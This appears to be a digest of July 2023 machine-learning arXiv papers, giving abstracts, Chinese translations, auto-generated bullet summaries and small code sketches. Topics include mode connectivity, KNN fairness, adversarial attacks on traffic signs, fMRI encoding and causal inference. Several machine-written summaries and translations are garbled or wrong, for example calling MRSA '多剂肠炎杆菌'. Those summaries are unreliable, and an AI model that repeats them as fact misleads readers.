    Abstract Recent work has revealed many intriguing empirical phenomena in neural network training, despite the poorly understood and highly complex loss landscapes and training dynamics. One of these phenomena, Linear Mode Connectivity (LMC), has gained considerable attention due to the intriguing observation that different solutions can be connected by a linear path in the parameter space while maintaining near-constant training and test losses. In this work, we introduce a stronger notion of linear connectivity, Layerwise Linear Feature Connectivity (LLFC), which says that the feature maps of every layer in different trained networks are also linearly connected. We provide comprehensive empirical evidence for LLFC across a wide range of settings, demonstrating that whenever two trained networks satisfy LMC (via either spawning or permutation methods), they also satisfy LLFC in nearly all the layers. Furthermore, we delve deeper into the underlying factors contributing to LLFC, which reveal new insights into the spawning and permutation approaches. The study of LLFC transcends and advances our understanding of LMC by adopting a feature-learning perspective.
    摘要 近期研究揭示了神经网络训练中许多有趣的实验现象,其中线性模式连通性(Linear Mode Connectivity,LMC)尤为引人注目:不同的解可以在参数空间中由一条线性路径相连,且训练和测试损失近乎保持不变。本文提出了一个更强的线性连通性概念——逐层线性特征连通性(Layerwise Linear Feature Connectivity,LLFC),即不同训练网络每一层的特征图也是线性相连的。我们在广泛的设置下给出了充分的实验证据,表明只要两个训练网络满足 LMC(无论是通过 spawning 还是 permutation 方法),它们几乎在所有层上也满足 LLFC。我们还进一步探讨了导致 LLFC 的内在因素,为理解 spawning 和 permutation 方法提供了新的洞见。LLFC 的研究从特征学习的视角超越并深化了我们对 LMC 的理解。
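
A small sketch of the LLFC measurement itself (not a training pipeline): compare the features of a weight-interpolated network with the linear interpolation of the two networks' features, layer by layer. With the random networks used below the gap is large; the paper's observation is that it is small for trained, LMC-connected networks.

```python
import torch
import torch.nn as nn

def mlp():
    return nn.Sequential(nn.Linear(10, 32), nn.ReLU(), nn.Linear(32, 32), nn.ReLU())

net_a, net_b, net_mix = mlp(), mlp(), mlp()
alpha = 0.5
with torch.no_grad():
    for pa, pb, pm in zip(net_a.parameters(), net_b.parameters(), net_mix.parameters()):
        pm.copy_(alpha * pa + (1 - alpha) * pb)    # interpolate weights

x = torch.randn(64, 10)

def features(net, x):
    feats, h = [], x
    for layer in net:
        h = layer(h)
        if isinstance(layer, nn.ReLU):
            feats.append(h)
    return feats

for i, (fa, fb, fm) in enumerate(zip(features(net_a, x), features(net_b, x), features(net_mix, x))):
    gap = (fm - (alpha * fa + (1 - alpha) * fb)).norm() / fm.norm()
    print(f"layer {i}: relative LLFC gap = {gap:.3f}")
```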

Complexity Matters: Rethinking the Latent Space for Generative Modeling

  • paper_url: http://arxiv.org/abs/2307.08283
  • repo_url: None
  • paper_authors: Tianyang Hu, Fei Chen, Haonan Wang, Jiawei Li, Wenjia Wang, Jiacheng Sun, Zhenguo Li
  • for: 本研究旨在探讨generative模型中latent space的选择,尤其是如何选择最佳的latent space,以提高generative性能。
  • methods: 我们提出了一种基于模型复杂度的latent space选择方法,并提出了一种两阶段训练策略called Decoupled Autoencoder (DAE),可以改善latent distribution并提高生成性能。
  • results: 我们的理论分析和实验结果表明,DAE可以提高sample质量,同时降低模型的复杂度。
    Abstract In generative modeling, numerous successful approaches leverage a low-dimensional latent space, e.g., Stable Diffusion models the latent space induced by an encoder and generates images through a paired decoder. Although the selection of the latent space is empirically pivotal, determining the optimal choice and the process of identifying it remain unclear. In this study, we aim to shed light on this under-explored topic by rethinking the latent space from the perspective of model complexity. Our investigation starts with the classic generative adversarial networks (GANs). Inspired by the GAN training objective, we propose a novel "distance" between the latent and data distributions, whose minimization coincides with that of the generator complexity. The minimizer of this distance is characterized as the optimal data-dependent latent that most effectively capitalizes on the generator's capacity. Then, we consider parameterizing such a latent distribution by an encoder network and propose a two-stage training strategy called Decoupled Autoencoder (DAE), where the encoder is only updated in the first stage with an auxiliary decoder and then frozen in the second stage while the actual decoder is being trained. DAE can improve the latent distribution and as a result, improve the generative performance. Our theoretical analyses are corroborated by comprehensive experiments on various models such as VQGAN and Diffusion Transformer, where our modifications yield significant improvements in sample quality with decreased model complexity.
    摘要 在生成模型中,许多成功的方法都利用低维潜空间,例如 Stable Diffusion 就是在编码器诱导的潜空间中建模,并通过配对的解码器生成图像。尽管潜空间的选择在经验上至关重要,但如何确定最优选择以及确定它的过程仍不清楚。本研究试图从模型复杂度的角度重新审视潜空间,以阐明这一尚未充分探索的问题。我们的研究从经典的生成对抗网络(GAN)出发:受 GAN 训练目标的启发,我们提出了一种潜分布与数据分布之间的新"距离",其最小化与生成器复杂度的最小化相一致;该距离的最小化点即为最优的数据相关潜分布,能够最有效地利用生成器的容量。随后,我们考虑用编码器网络来参数化这一潜分布,并提出名为解耦自编码器(Decoupled Autoencoder,DAE)的两阶段训练策略:第一阶段编码器与一个辅助解码器一起更新,第二阶段冻结编码器,只训练真正的解码器。DAE 能够改善潜分布,进而提升生成性能。我们的理论分析得到了在 VQGAN、Diffusion Transformer 等多种模型上的大量实验的印证:我们的改进在降低模型复杂度的同时显著提升了样本质量。
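
An illustrative two-stage training sketch in the spirit of DAE, on toy data; the linear encoder/decoders and MSE objective are simplified stand-ins, not the paper's architectures.

```python
import torch
import torch.nn as nn

enc = nn.Sequential(nn.Linear(32, 8))
aux_dec = nn.Sequential(nn.Linear(8, 32))     # stage-1 auxiliary decoder
dec = nn.Sequential(nn.Linear(8, 32))         # stage-2 actual decoder
data = torch.randn(256, 32)

# Stage 1: train the encoder jointly with the auxiliary decoder.
opt1 = torch.optim.Adam(list(enc.parameters()) + list(aux_dec.parameters()), lr=1e-2)
for _ in range(200):
    loss = nn.functional.mse_loss(aux_dec(enc(data)), data)
    opt1.zero_grad(); loss.backward(); opt1.step()

# Stage 2: freeze the encoder (fix the latent distribution), train the actual decoder.
for p in enc.parameters():
    p.requires_grad_(False)
opt2 = torch.optim.Adam(dec.parameters(), lr=1e-2)
for _ in range(200):
    loss = nn.functional.mse_loss(dec(enc(data)), data)
    opt2.zero_grad(); loss.backward(); opt2.step()
print("stage-2 reconstruction loss:", float(loss))
```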

Certifying the Fairness of KNN in the Presence of Dataset Bias

  • paper_url: http://arxiv.org/abs/2307.08722
  • repo_url: None
  • paper_authors: Yannan Li, Jingbo Wang, Chao Wang
  • for: The paper is written for certifying the fairness of the classification result of the k-nearest neighbors (KNN) algorithm under the assumption of historical bias in the training data.
  • methods: The paper proposes a method for certifying fairness based on three variants of fairness definitions: individual fairness, $\epsilon$-fairness, and label-flipping fairness. The method uses sound approximations of the complex arithmetic computations used in the state-of-the-art KNN algorithm to reduce computational cost.
  • results: The paper shows the effectiveness of the proposed method through experimental evaluation on six widely used datasets in the fairness research literature. The method is able to obtain fairness certifications for a large number of test inputs despite the presence of historical bias in the datasets.
    Abstract We propose a method for certifying the fairness of the classification result of a widely used supervised learning algorithm, the k-nearest neighbors (KNN), under the assumption that the training data may have historical bias caused by systematic mislabeling of samples from a protected minority group. To the best of our knowledge, this is the first certification method for KNN based on three variants of the fairness definition: individual fairness, $\epsilon$-fairness, and label-flipping fairness. We first define the fairness certification problem for KNN and then propose sound approximations of the complex arithmetic computations used in the state-of-the-art KNN algorithm. This is meant to lift the computation results from the concrete domain to an abstract domain, to reduce the computational cost. We show effectiveness of this abstract interpretation based technique through experimental evaluation on six datasets widely used in the fairness research literature. We also show that the method is accurate enough to obtain fairness certifications for a large number of test inputs, despite the presence of historical bias in the datasets.
    摘要 我们提出了一种方法,用于证明某种广泛使用的直接学习算法(k-最近邻)的分类结果是否公平,假设训练数据可能受到历史偏见的影响,特别是保护少数群体样本的系统化错误标注。根据我们所知,这是第一种基于三种公平定义(个体公平、ε-公平和标签抓取公平)的公平证明方法。我们首先定义了公平证明问题,然后提出了使用现代KNN算法中的复杂数学计算的准确估计方法,以减少计算成本。我们通过实验评估六个广泛用于公平研究文献中的数据集,并证明了这种抽象计算方法的有效性。我们还证明了方法可以快速获得大量测试输入的公平证明,即使训练数据中存在历史偏见。
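
A concrete-domain sketch of one of the three definitions, label-flipping robustness for a single k-NN prediction (the paper adds sound abstractions to scale this, and also covers individual and $\epsilon$-fairness): can flipping at most n training labels change the majority vote among the k nearest neighbours? Flipping labels does not change which points are neighbours, so a margin check over the vote counts suffices.

```python
import numpy as np
from collections import Counter

def label_flip_certified(X, y, x, k=5, n_flips=1):
    idx = np.argsort(np.linalg.norm(X - x, axis=1))[:k]
    votes = Counter(y[idx])
    top_label, top_count = votes.most_common(1)[0]
    runner_up = max((c for l, c in votes.items() if l != top_label), default=0)
    # Each flipped label can move one vote from the winner to the runner-up,
    # so the outcome is stable iff the margin exceeds twice the flip budget.
    return (top_count - runner_up) > 2 * n_flips

rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0, 1, (30, 2)), rng.normal(4, 1, (30, 2))])
y = np.array([0] * 30 + [1] * 30)
print(label_flip_certified(X, y, np.array([0.2, 0.1]), k=5, n_flips=1))   # deep inside a class
print(label_flip_certified(X, y, np.array([2.0, 2.0]), k=5, n_flips=1))   # near the boundary
```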

Automated Action Model Acquisition from Narrative Texts

  • paper_url: http://arxiv.org/abs/2307.10247
  • repo_url: None
  • paper_authors: Ruiqi Li, Leyang Cui, Songtuan Lin, Patrik Haslum
  • for: 本研究旨在提高AI代理人的规划技术应用,通过自动从叙述文本中提取струк成事件和生成 планинг语言风格的动作模型。
  • methods: 本研究使用了自动提取叙述文本中的结构事件,并通过预测通用常识事件关系、文本矛盾和相似性来生成 planning-language-style 动作模型。
  • results: 实验结果表明,NaRuto可以在经典叙述规划领域生成高质量的动作模型,与现有的完全自动方法相当,甚至与半自动方法相当。
    Abstract Action models, which take the form of precondition/effect axioms, facilitate causal and motivational connections between actions for AI agents. Action model acquisition has been identified as a bottleneck in the application of planning technology, especially within narrative planning. Acquiring action models from narrative texts in an automated way is essential, but challenging because of the inherent complexities of such texts. We present NaRuto, a system that extracts structured events from narrative text and subsequently generates planning-language-style action models based on predictions of commonsense event relations, as well as textual contradictions and similarities, in an unsupervised manner. Experimental results in classical narrative planning domains show that NaRuto can generate action models of significantly better quality than existing fully automated methods, and even on par with those of semi-automated methods.
    摘要 行动模型以前提/效果公理的形式,为 AI 智能体在行动之间建立因果与动机上的联系。行动模型的获取被认为是规划技术应用的瓶颈,在叙事规划领域尤为突出。以自动化方式从叙事文本中获取行动模型十分重要,但由于此类文本固有的复杂性而颇具挑战。我们提出了 NaRuto 系统,它先从叙事文本中抽取结构化事件,再以无监督的方式基于常识事件关系预测以及文本间的矛盾与相似性,生成规划语言风格的行动模型。在经典叙事规划领域的实验结果表明,NaRuto 生成的行动模型质量显著优于现有的全自动方法,甚至可与半自动方法相媲美。

Adversarial Attacks on Traffic Sign Recognition: A Survey

  • paper_url: http://arxiv.org/abs/2307.08278
  • repo_url: None
  • paper_authors: Svetlana Pavlitska, Nico Lambing, J. Marius Zöllner
  • for: 本研究旨在探讨攻击 autonomous driving 系统的可能性,尤其是针对交通标识模型的攻击。
  • methods: 本研究准确地描述了现有的攻击方法,包括数字和实际攻击。
  • results: 研究发现,现有的攻击方法可以轻松地破坏交通标识模型的正常工作,需要进一步的研究以减少这些攻击的风险。
    Abstract Traffic sign recognition is an essential component of perception in autonomous vehicles, which is currently performed almost exclusively with deep neural networks (DNNs). However, DNNs are known to be vulnerable to adversarial attacks. Several previous works have demonstrated the feasibility of adversarial attacks on traffic sign recognition models. Traffic signs are particularly promising for adversarial attack research due to the ease of performing real-world attacks using printed signs or stickers. In this work, we survey existing works performing either digital or real-world attacks on traffic sign detection and classification models. We provide an overview of the latest advancements and highlight the existing research areas that require further investigation.
    摘要 自动驾驶车辆的辨识功能中,交通标志识别是一个关键组件,目前大多使用深度神经网络(DNN)来实现。但是,DNN受到恶意攻击的可能性很高。先前的研究已经证明了对交通标志识别模型的攻击的可能性。由于交通标志的易攻击性,使得实际攻击更加容易。在这种情况下,我们对现有的数字和实际攻击研究进行了抽象和概述,并高亮了需要进一步研究的领域。
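
For context, the snippet below shows FGSM, a canonical digital attack of the kind such surveys cover, applied to a toy untrained CNN and a random stand-in "sign" image; a real evaluation would use a trained traffic-sign classifier (e.g., on GTSRB's 43 classes). This example is illustrative only and is not drawn from the survey itself.

```python
import torch
import torch.nn as nn

model = nn.Sequential(nn.Conv2d(3, 8, 3, padding=1), nn.ReLU(),
                      nn.AdaptiveAvgPool2d(1), nn.Flatten(), nn.Linear(8, 43))
image = torch.rand(1, 3, 32, 32, requires_grad=True)
label = torch.tensor([7])                        # hypothetical class id

loss = nn.functional.cross_entropy(model(image), label)
loss.backward()
epsilon = 8 / 255
adv_image = (image + epsilon * image.grad.sign()).clamp(0, 1).detach()   # FGSM step
print("prediction before:", model(image).argmax().item(),
      "after:", model(adv_image).argmax().item())
```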

Deep Neural Networks and Brain Alignment: Brain Encoding and Decoding (Survey)

  • paper_url: http://arxiv.org/abs/2307.10246
  • repo_url: None
  • paper_authors: Subba Reddy Oota, Manish Gupta, Raju S. Bapi, Gael Jobard, Frederic Alexandre, Xavier Hinaut
  • for: 研究大脑如何表示不同的信息模式,以及设计一个系统可以自动理解用户的思维?
  • methods: 使用 функциональ磁共振成像(fMRI)记录大脑活动,并提出了多种基于深度学习的编码和解码模型。
  • results: 这些模型可以用于评估和诊断神经科学问题,以及设计大脑机器或计算机界面。
    Abstract How does the brain represent different modes of information? Can we design a system that automatically understands what the user is thinking? Such questions can be answered by studying brain recordings like functional magnetic resonance imaging (fMRI). As a first step, the neuroscience community has contributed several large cognitive neuroscience datasets related to passive reading/listening/viewing of concept words, narratives, pictures and movies. Encoding and decoding models using these datasets have also been proposed in the past two decades. These models serve as additional tools for basic research in cognitive science and neuroscience. Encoding models aim at generating fMRI brain representations given a stimulus automatically. They have several practical applications in evaluating and diagnosing neurological conditions and thus also help design therapies for brain damage. Decoding models solve the inverse problem of reconstructing the stimuli given the fMRI. They are useful for designing brain-machine or brain-computer interfaces. Inspired by the effectiveness of deep learning models for natural language processing, computer vision, and speech, recently several neural encoding and decoding models have been proposed. In this survey, we will first discuss popular representations of language, vision and speech stimuli, and present a summary of neuroscience datasets. Further, we will review popular deep learning based encoding and decoding architectures and note their benefits and limitations. Finally, we will conclude with a brief summary and discussion about future trends. Given the large amount of recently published work in the `computational cognitive neuroscience' community, we believe that this survey nicely organizes the plethora of work and presents it as a coherent story.
    摘要 如何让脑子表示不同的信息?我们可以通过研究脑电图像(fMRI)来回答这些问题。脑科学社区已经提供了许多大量的认知神经科学数据集,这些数据集关于静止阅读/听取/观看概念词、故事、图片和电影。使用这些数据集,以前已经提出了编码和解码模型。这些模型可以用于基础研究认知科学和神经科学。编码模型可以自动生成脑电图像,它们有许多实际应用,如诊断和治疗神经系统疾病。解码模型可以 reconstruction 脑电图像,它们有用于设计脑机或脑计算机界面。鼓励于深度学习模型在自然语言处理、计算机视觉和语音处理等领域的效果,最近几年有很多 neural encoding 和 decoding 模型被提出。在这篇评论中,我们将首先讲讲语言、视觉和听说 stimuli 的受欢迎表示,并提供脑科学数据集的摘要。然后,我们将回顾深度学习基于编码和解码架构的一些模型,并注意它们的优点和局限性。最后,我们将结束于简要的总结和讨论,并讨论未来的趋势。由于最近出版的大量工作在 'computational cognitive neuroscience' 社区,我们认为这篇评论 nicely 组织了这些工作,并将它们表现为一个coherent 的故事。
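
As a minimal illustration of the encoding-model setting surveyed above, the sketch below fits a ridge regression from stimulus features to voxel responses and scores it with per-voxel correlation, a common baseline in this literature. The data is synthetic; real studies use fMRI recordings and learned stimulus embeddings.

```python
import numpy as np
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
n_samples, n_features, n_voxels = 400, 50, 200
stimulus = rng.normal(size=(n_samples, n_features))           # e.g., word embeddings
true_weights = rng.normal(size=(n_features, n_voxels))
fmri = stimulus @ true_weights + rng.normal(scale=2.0, size=(n_samples, n_voxels))

Xtr, Xte, ytr, yte = train_test_split(stimulus, fmri, random_state=0)
encoder = Ridge(alpha=10.0).fit(Xtr, ytr)
pred = encoder.predict(Xte)
# Per-voxel prediction accuracy (Pearson correlation), the usual evaluation.
corr = [np.corrcoef(pred[:, v], yte[:, v])[0, 1] for v in range(n_voxels)]
print(f"mean voxel correlation: {np.mean(corr):.2f}")
```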

Transferable Graph Neural Fingerprint Models for Quick Response to Future Bio-Threats

  • paper_url: http://arxiv.org/abs/2308.01921
  • repo_url: None
  • paper_authors: Wei Chen, Yihui Ren, Ai Kagawa, Matthew R. Carbone, Samuel Yen-Chi Chen, Xiaohui Qu, Shinjae Yoo, Austin Clyde, Arvind Ramanathan, Rick L. Stevens, Hubertus J. J. van Dam, Deyu Liu
  • for: 这个论文的目的是为了快速屏测药物分子,以便在药物发现过程中快速搜索出有效的药物候选者。
  • methods: 这个论文使用的方法是基于蛋白质绑定亲和力的图 neural fingerprint方法,这种方法可以在高速和高准确性之间进行药物 docking 模拟。
  • results: 结果表明,图神经指纹方法可以对 COVID-19 药物对接问题进行高通量虚拟筛选,其预测精度优于传统的圆形指纹方法,在大多数对接目标上均方误差低于 $0.21$ kcal/mol。此外,作者还提出了一种可迁移到未知目标的图神经指纹方法,该方法在多个目标上联合训练,准确性与针对特定目标的模型相当。
    Abstract Fast screening of drug molecules based on the ligand binding affinity is an important step in the drug discovery pipeline. Graph neural fingerprint is a promising method for developing molecular docking surrogates with high throughput and great fidelity. In this study, we built a COVID-19 drug docking dataset of about 300,000 drug candidates on 23 coronavirus protein targets. With this dataset, we trained graph neural fingerprint docking models for high-throughput virtual COVID-19 drug screening. The graph neural fingerprint models yield high prediction accuracy on docking scores with the mean squared error lower than $0.21$ kcal/mol for most of the docking targets, showing significant improvement over conventional circular fingerprint methods. To make the neural fingerprints transferable for unknown targets, we also propose a transferable graph neural fingerprint method trained on multiple targets. With comparable accuracy to target-specific graph neural fingerprint models, the transferable model exhibits superb training and data efficiency. We highlight that the impact of this study extends beyond COVID-19 dataset, as our approach for fast virtual ligand screening can be easily adapted and integrated into a general machine learning-accelerated pipeline to battle future bio-threats.
    摘要 基于配体结合亲和力对药物分子进行快速筛选是药物发现流程中的重要步骤。图神经指纹是一种有前景的方法,可用于构建高通量、高保真度的分子对接代理模型。在这项研究中,我们构建了一个包含约30万个候选药物、覆盖23个冠状病毒蛋白靶点的 COVID-19 药物对接数据集。基于该数据集,我们训练了用于高通量虚拟 COVID-19 药物筛选的图神经指纹对接模型。图神经指纹模型在大多数对接靶点上对对接分数的预测均方误差低于 $0.21$ kcal/mol,相比传统圆形指纹方法有显著提升。为使神经指纹可迁移到未知靶点,我们还提出了在多个靶点上训练的可迁移图神经指纹方法。该方法在准确性上与针对特定靶点的模型相当,同时具有出色的训练与数据效率。我们强调,本研究的影响不止于 COVID-19 数据集:这种快速虚拟配体筛选方法可以方便地适配并整合到通用的机器学习加速流程中,以应对未来的生物威胁。

Evaluating and Enhancing Robustness of Deep Recommendation Systems Against Hardware Errors

  • paper_url: http://arxiv.org/abs/2307.10244
  • repo_url: https://github.com/vu-detail/pytei
  • paper_authors: Dongning Ma, Xun Jiao, Fred Lin, Mengshi Zhang, Alban Desmaison, Thomas Sellinger, Daniel Moore, Sriram Sankar
  • for: 这 paper 是关于深度推荐系统(DRS)的可靠性研究,以寻找在大规模队列系统中发现的硬件错误对 DRS 的影响。
  • methods: 这 paper 使用了 PyTorch 构建了一个简单、高效、可扩展的错误插入框架(Terrorch),以测试 DRS 的可靠性。
  • results: 研究发现,DRS 对硬件错误的抵抗力受到多种因素的影响,包括模型参数和输入特征。研究还发现,使用活动clipping可以提高 AUC-ROC 分数,达到30%的恢复率。
    Abstract Deep recommendation systems (DRS) heavily depend on specialized HPC hardware and accelerators to optimize energy, efficiency, and recommendation quality. Despite the growing number of hardware errors observed in large-scale fleet systems where DRS are deployed, the robustness of DRS has been largely overlooked. This paper presents the first systematic study of DRS robustness against hardware errors. We develop Terrorch, a user-friendly, efficient and flexible error injection framework on top of the widely-used PyTorch. We evaluate a wide range of models and datasets and observe that the DRS robustness against hardware errors is influenced by various factors from model parameters to input characteristics. We also explore 3 error mitigation methods including algorithm based fault tolerance (ABFT), activation clipping and selective bit protection (SBP). We find that applying activation clipping can recover up to 30% of the degraded AUC-ROC score, making it a promising mitigation method.
    摘要 深度推荐系统(DRS)高度依赖专用的高性能计算硬件和加速器来优化能耗、效率和推荐质量。尽管在部署 DRS 的大规模集群系统中观察到的硬件错误日益增多,DRS 的鲁棒性问题却长期被忽视。本文首次对 DRS 在硬件错误下的鲁棒性进行了系统性研究。我们基于广泛使用的 PyTorch 开发了一个易用、高效且灵活的错误注入框架 Terrorch。我们对多种模型和数据集进行了评估,发现 DRS 对硬件错误的鲁棒性受到从模型参数到输入特征等多种因素的影响。我们还探讨了三种错误缓解方法,包括基于算法的容错(ABFT)、激活值裁剪和选择性比特保护(SBP)。我们发现,采用激活值裁剪可以恢复最多30%因错误而下降的 AUC-ROC 分数,是一种有前景的缓解方法。
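
A hedged sketch of hardware-style error injection in the spirit of the Terrorch framework (not its actual API): flip one random bit in a small fraction of a float32 tensor's elements, then apply a clipping-style mitigation. Note that single-bit flips in floats can produce extreme values, Inf, or NaN, which is exactly what clipping aims to contain.

```python
import numpy as np
import torch

def inject_bit_flips(tensor: torch.Tensor, rate: float = 1e-3, seed: int = 0) -> torch.Tensor:
    rng = np.random.default_rng(seed)
    flat = tensor.detach().cpu().numpy().astype(np.float32).ravel().copy()
    bits = flat.view(np.uint32)                              # reinterpret the float bytes
    hit = rng.random(bits.shape) < rate                      # elements to corrupt
    positions = rng.integers(0, 32, size=bits.shape, dtype=np.uint32)
    bits[hit] ^= (np.ones_like(positions[hit]) << positions[hit])   # single-bit flips
    return torch.from_numpy(flat.reshape(tensor.shape))

weights = torch.randn(1000, 64)
corrupted = inject_bit_flips(weights, rate=1e-3)
changed = int((corrupted != weights).sum())
print("elements changed:", changed)

# Mitigation in the spirit of activation/value clipping: bound corrupted values.
clipped = corrupted.clamp(-4.0, 4.0)
```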

Convex Bi-Level Optimization Problems with Non-smooth Outer Objective Function

  • paper_url: http://arxiv.org/abs/2307.08245
  • repo_url: None
  • paper_authors: Roey Merchav, Shoham Sabach
  • for: 解决 convex bi-level 优化问题
  • methods: 提出 Bi-Sub-Gradient (Bi-SG) 方法,基于 classical sub-gradient 方法的一种泛化
  • results: Bi-SG 方法可以在 convex bi-level 优化问题中实现 sub-线性速率,并且如果外部目标函数具有强度 convexity,可以提高外部速率至线性速率。此外,我们证明 Bi-SG 方法生成的序列与 bi-level 优化问题的优化解的距离 converges to zero.
    Abstract In this paper, we propose the Bi-Sub-Gradient (Bi-SG) method, which is a generalization of the classical sub-gradient method to the setting of convex bi-level optimization problems. This is a first-order method that is very easy to implement in the sense that it requires only a computation of the associated proximal mapping or a sub-gradient of the outer non-smooth objective function, in addition to a proximal gradient step on the inner optimization problem. We show, under very mild assumptions, that Bi-SG tackles bi-level optimization problems and achieves sub-linear rates both in terms of the inner and outer objective functions. Moreover, if the outer objective function is additionally strongly convex (still could be non-smooth), the outer rate can be improved to a linear rate. Last, we prove that the distance of the generated sequence to the set of optimal solutions of the bi-level problem converges to zero.
    摘要 本文提出了 Bi-Sub-Gradient(Bi-SG)方法,它是经典次梯度法在凸双层优化问题上的推广。该方法是一种非常易于实现的一阶方法:除了对内层优化问题执行一步近端梯度外,只需计算外层非光滑目标函数的近端映射或一个次梯度。我们证明,在非常温和的假设下,Bi-SG 能够求解双层优化问题,并在内层与外层目标函数上均达到次线性收敛速率。此外,若外层目标函数还是强凸的(仍可以非光滑),外层收敛速率可以提升为线性。最后,我们证明所生成序列到双层问题最优解集的距离收敛到零。

A Look into Causal Effects under Entangled Treatment in Graphs: Investigating the Impact of Contact on MRSA Infection

  • paper_url: http://arxiv.org/abs/2307.08237
  • repo_url: None
  • paper_authors: Jing Ma, Chen Chen, Anil Vullikanti, Ritwick Mishra, Gregory Madden, Daniel Borrajo, Jundong Li
  • for: The paper is written to study the problem of causal effect estimation with treatment entangled in a graph, and to propose a novel method (NEAT) to tackle this challenge.
  • methods: The proposed method NEAT explicitly leverages the graph structure to model the treatment assignment mechanism, and mitigates confounding biases based on the treatment assignment modeling.
  • results: The proposed method is validated through experiments on both synthetic datasets and a real-world MRSA dataset, and provides effective results in estimating causal effects with entangled treatments.
    Abstract Methicillin-resistant Staphylococcus aureus (MRSA) is a type of bacteria resistant to certain antibiotics, making it difficult to prevent MRSA infections. Among decades of efforts to conquer infectious diseases caused by MRSA, many studies have been proposed to estimate the causal effects of close contact (treatment) on MRSA infection (outcome) from observational data. In this problem, the treatment assignment mechanism plays a key role as it determines the patterns of missing counterfactuals -- the fundamental challenge of causal effect estimation. Most existing observational studies for causal effect learning assume that the treatment is assigned individually for each unit. However, on many occasions, the treatments are pairwisely assigned for units that are connected in graphs, i.e., the treatments of different units are entangled. Neglecting the entangled treatments can impede the causal effect estimation. In this paper, we study the problem of causal effect estimation with treatment entangled in a graph. Despite a few explorations for entangled treatments, this problem still remains challenging due to the following challenges: (1) the entanglement brings difficulties in modeling and leveraging the unknown treatment assignment mechanism; (2) there may exist hidden confounders which lead to confounding biases in causal effect estimation; (3) the observational data is often time-varying. To tackle these challenges, we propose a novel method NEAT, which explicitly leverages the graph structure to model the treatment assignment mechanism, and mitigates confounding biases based on the treatment assignment modeling. We also extend our method into a dynamic setting to handle time-varying observational data. Experiments on both synthetic datasets and a real-world MRSA dataset validate the effectiveness of the proposed method, and provide insights for future applications.
    摘要 MRSA(多剂肠炎杆菌)是一种抗药菌,它的感染难以预防。在抗生素耗用多年的尝试下,许多研究被提出来估计MRSA感染的 causal effect,从观察数据中获得。在这个问题中,治疗分配机制扮演着关键的角色,它确定了潜在的缺失对照数据的模式——基本挑战 causal effect 估计。大多数现有的观察数据研究假设每个单元都 individually 接受了治疗。然而,在许多情况下,治疗是在图表中连接的单元之间分配的,即不同单元的治疗是 entangled 的。忽略这些杂合的治疗可能会妨碍 causal effect 估计。在这篇文章中,我们研究了图表中的 causal effect 估计问题。虽然有一些对 entangled 治疗的探索,但这个问题仍然具有挑战,因为:(1)杂合带来了对 treatment assignment mechanism 的模型和利用的困难;(2)可能存在隐藏的假设因素,导致 causal effect 估计受到抵消的影响;(3)观察数据通常是时间变化的。为了解决这些挑战,我们提出了一种新方法 NEAT,它明确利用图表结构来模型治疗分配机制,并根据治疗分配模型来减少假设因素的影响。我们还将方法推广到动态设定,以处理时间变化的观察数据。在 synthetic 数据和一个实际MRSA数据上进行了实验,并证明了我们的方法的有效性,并提供了未来应用的参考。

HeroLT: Benchmarking Heterogeneous Long-Tailed Learning

  • paper_url: http://arxiv.org/abs/2307.08235
  • repo_url: https://github.com/ssskj/herolt
  • paper_authors: Haohui Wang, Weijie Guan, Jianpeng Chen, Zi Wang, Dawei Zhou
  • for: 本研究旨在提供一个系统性的长尾学习视角,涵盖数据长尾性、域困难度和新任务多样性等三个纬度。
  • methods: 本研究开发了包括13种现状之最先进算法和6种评价指标的最全面的长尾学习 benchmark 名为 HeroLT,并在14个真实 benchmark 数据集上进行了264项实验。
  • results: 研究人员通过对 HeroLT benchmark 进行了全面的实验和分析,并提出了一些有 Promise 的未来方向。
    Abstract Long-tailed data distributions are prevalent in a variety of domains, including finance, e-commerce, biomedical science, and cyber security. In such scenarios, the performance of machine learning models is often dominated by the head categories, while the learning of tail categories is significantly inadequate. Given abundant studies conducted to alleviate the issue, this work aims to provide a systematic view of long-tailed learning with regard to three pivotal angles: (A1) the characterization of data long-tailedness, (A2) the data complexity of various domains, and (A3) the heterogeneity of emerging tasks. To achieve this, we develop the most comprehensive (to the best of our knowledge) long-tailed learning benchmark named HeroLT, which integrates 13 state-of-the-art algorithms and 6 evaluation metrics on 14 real-world benchmark datasets across 4 tasks from 3 domains. HeroLT with novel angles and extensive experiments (264 in total) enables researchers and practitioners to effectively and fairly evaluate newly proposed methods compared with existing baselines on varying types of datasets. Finally, we conclude by highlighting the significant applications of long-tailed learning and identifying several promising future directions. For accessibility and reproducibility, we open-source our benchmark HeroLT and corresponding results at https://github.com/SSSKJ/HeroLT.
    摘要 长尾数据分布广泛存在于金融、电商、生物医学和网络安全等多个领域。在这些场景下,机器学习模型的性能往往由头部类别主导,而尾部类别的学习则明显不足。尽管已有大量旨在缓解该问题的研究,本工作希望从三个关键角度为长尾学习提供系统性视图:(A1)数据长尾性的刻画,(A2)不同领域的数据复杂度,以及(A3)新兴任务的多样性。为此,我们开发了据我们所知最全面的长尾学习基准 HeroLT,它在来自3个领域、4类任务的14个真实世界基准数据集上集成了13种最新算法和6种评价指标。HeroLT 凭借新颖的视角和总计264组的大量实验,帮助研究者和实践者在不同类型的数据集上,针对现有基线对新提出的方法进行有效且公平的评估。最后,我们强调了长尾学习的重要应用,并指出了若干有前景的未来方向。为了便于获取和复现,我们在 GitHub 上开源了 HeroLT 基准及相应结果。

Learning for Counterfactual Fairness from Observational Data

  • paper_url: http://arxiv.org/abs/2307.08232
  • repo_url: None
  • paper_authors: Jing Ma, Ruocheng Guo, Aidong Zhang, Jundong Li
  • for: 避免机器学习模型具有对某些子群体的偏见(如种族、性别、年龄等),实现对所有 subgroup 的公正预测。
  • methods: Counterfactual fairness 是一种从 causal 角度定义的公正性观,通过比较每个个体在原始世界和在对敏感特征值进行修改后的世界中的预测,来衡量模型的公正性。但在实际应用中,通常无法获得准确的 causal 模型,因此直接使用这些模型可能会带来偏见。本文提出了一种新的框架 CLAIRE,通过对数据进行 counterfactual 数据扩展和一种对称约束来减轻敏感特征的偏见。
  • results: experiments 表明,CLAIRE 在对实际数据进行预测时比其他方法更好,同时也能够保证对所有 subgroup 的公正预测。
